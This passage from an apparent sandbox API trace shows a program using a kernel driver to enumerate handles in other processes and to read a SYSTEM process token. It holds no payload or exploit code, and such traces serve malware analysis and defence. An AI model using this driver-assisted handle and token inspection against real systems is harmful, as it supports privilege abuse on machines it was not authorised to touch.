hHeap=0x320000) returned 1 [0223.814] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0223.814] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.814] PsAcquireProcessExitSynchronization () returned 0x0 [0223.815] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.815] ObReferenceObjectByHandle (in: Handle=0x46c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039fd070, HandleInformation=0x0) returned 0x0 [0223.815] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.815] PsReleaseProcessExitSynchronization () returned 0x2 [0223.815] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.815] ObQueryNameString (in: Object=0xfffffa80039fd070, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.815] ObfDereferenceObject (Object=0xfffffa80039fd070) returned 0x1 [0223.815] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.815] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.815] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.815] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0223.815] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.815] PsAcquireProcessExitSynchronization () returned 0x0 [0223.815] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.815] ObReferenceObjectByHandle (in: Handle=0x470, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039fddd0, HandleInformation=0x0) returned 0x0 [0223.815] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.815] PsReleaseProcessExitSynchronization () returned 0x2 [0223.815] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.815] ObQueryNameString (in: Object=0xfffffa80039fddd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.815] ObfDereferenceObject (Object=0xfffffa80039fddd0) returned 0x2 [0223.815] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.815] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.816] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.816] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0223.816] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.816] PsAcquireProcessExitSynchronization () returned 0x0 [0223.816] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.816] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039fdc80, HandleInformation=0x0) returned 0x0 [0223.816] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.816] PsReleaseProcessExitSynchronization () returned 0x2 [0223.816] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.816] ObQueryNameString (in: Object=0xfffffa80039fdc80, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.816] ObfDereferenceObject (Object=0xfffffa80039fdc80) returned 0x1 [0223.816] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.816] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.816] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.816] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0223.816] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.816] PsAcquireProcessExitSynchronization () returned 0x0 [0223.816] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.816] ObReferenceObjectByHandle (in: Handle=0x57c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0223.816] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.816] PsReleaseProcessExitSynchronization () returned 0x2 [0223.816] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.816] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.816] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x5 [0223.817] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.817] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.817] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.817] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0223.817] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.817] PsAcquireProcessExitSynchronization () returned 0x0 [0223.817] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.817] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003aba990, HandleInformation=0x0) returned 0x0 [0223.817] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.817] PsReleaseProcessExitSynchronization () returned 0x2 [0223.817] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.817] ObQueryNameString (in: Object=0xfffffa8003aba990, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.817] ObfDereferenceObject (Object=0xfffffa8003aba990) returned 0x2 [0223.817] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.817] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.817] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.817] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0223.817] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.817] PsAcquireProcessExitSynchronization () returned 0x0 [0223.818] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.818] ObReferenceObjectByHandle (in: Handle=0x584, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003abac80, HandleInformation=0x0) returned 0x0 [0223.818] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.818] PsReleaseProcessExitSynchronization () returned 0x2 [0223.818] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.818] ObQueryNameString (in: Object=0xfffffa8003abac80, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.818] ObfDereferenceObject (Object=0xfffffa8003abac80) returned 0x1 [0223.818] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.818] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.818] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0223.818] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.818] PsAcquireProcessExitSynchronization () returned 0x0 [0223.818] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.818] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0223.818] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.818] PsReleaseProcessExitSynchronization () returned 0x2 [0223.818] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.818] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.818] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0223.818] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.818] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.818] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0223.818] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.818] PsAcquireProcessExitSynchronization () returned 0x0 [0223.819] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.819] ObReferenceObjectByHandle (in: Handle=0x660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a5af20, HandleInformation=0x0) returned 0x0 [0223.819] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.819] PsReleaseProcessExitSynchronization () returned 0x2 [0223.819] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.819] ObQueryNameString (in: Object=0xfffffa80026ec8a0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.819] ObfDereferenceObject (Object=0xfffffa8003a5af20) returned 0x1 [0223.819] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.819] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.819] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.819] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0223.819] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.819] PsAcquireProcessExitSynchronization () returned 0x0 [0223.819] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.819] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a033a0, HandleInformation=0x0) returned 0x0 [0223.819] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.819] PsReleaseProcessExitSynchronization () returned 0x2 [0223.819] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.820] ObQueryNameString (in: Object=0xfffffa8003a033a0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.820] ObfDereferenceObject (Object=0xfffffa8003a033a0) returned 0x11 [0223.820] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.820] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.820] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.820] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.820] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.820] PsAcquireProcessExitSynchronization () returned 0x0 [0223.820] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.820] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034d2d10, HandleInformation=0x0) returned 0x0 [0223.820] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.820] PsReleaseProcessExitSynchronization () returned 0x2 [0223.820] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.820] ObQueryNameString (in: Object=0xfffffa80034d2d10, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.820] ObfDereferenceObject (Object=0xfffffa80034d2d10) returned 0x1 [0223.820] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.820] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x370) returned 0xc8 [0223.820] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0223.820] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800382ab30, HandleInformation=0x0) returned 0x0 [0223.821] ObOpenObjectByPointer (in: Object=0xfffffa800382ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000081c) returned 0x0 [0223.821] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e4 [0223.821] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000081c, DesiredAccess=0x8, TokenHandle=0xfffffa800313c7c0 | out: TokenHandle=0xfffffa800313c7c0*=0xc4) returned 0x0 [0223.821] ZwClose (Handle=0xffffffff8000081c) returned 0x0 [0223.821] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.821] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0223.821] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0223.823] CloseHandle (hObject=0xc4) returned 1 [0223.823] CloseHandle (hObject=0xc8) returned 1 [0223.823] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.823] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0223.823] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.823] PsAcquireProcessExitSynchronization () returned 0x0 [0223.823] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.823] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800382cd00, HandleInformation=0x0) returned 0x0 [0223.823] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.823] PsReleaseProcessExitSynchronization () returned 0x2 [0223.824] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.824] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.824] ObfDereferenceObject (Object=0xfffffa800382cd00) returned 0x1 [0223.824] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.824] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.824] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.824] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0223.824] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.824] PsAcquireProcessExitSynchronization () returned 0x0 [0223.824] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.824] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003831a60, HandleInformation=0x0) returned 0x0 [0223.824] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.824] PsReleaseProcessExitSynchronization () returned 0x2 [0223.824] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.824] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.824] ObfDereferenceObject (Object=0xfffffa8003831a60) returned 0x1 [0223.824] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.824] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.824] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.824] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.824] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.825] PsAcquireProcessExitSynchronization () returned 0x0 [0223.825] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.825] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.825] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.825] PsReleaseProcessExitSynchronization () returned 0x2 [0223.825] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.825] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.825] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.825] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.825] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.825] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.825] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0223.825] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.825] PsAcquireProcessExitSynchronization () returned 0x0 [0223.825] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.825] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ab57b0, HandleInformation=0x0) returned 0x0 [0223.825] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.825] PsReleaseProcessExitSynchronization () returned 0x2 [0223.826] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.826] ObQueryNameString (in: Object=0xfffff8a000ab57b0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.826] ObfDereferenceObject (Object=0xfffff8a000ab57b0) returned 0x2 [0223.826] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.826] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.826] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.826] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, 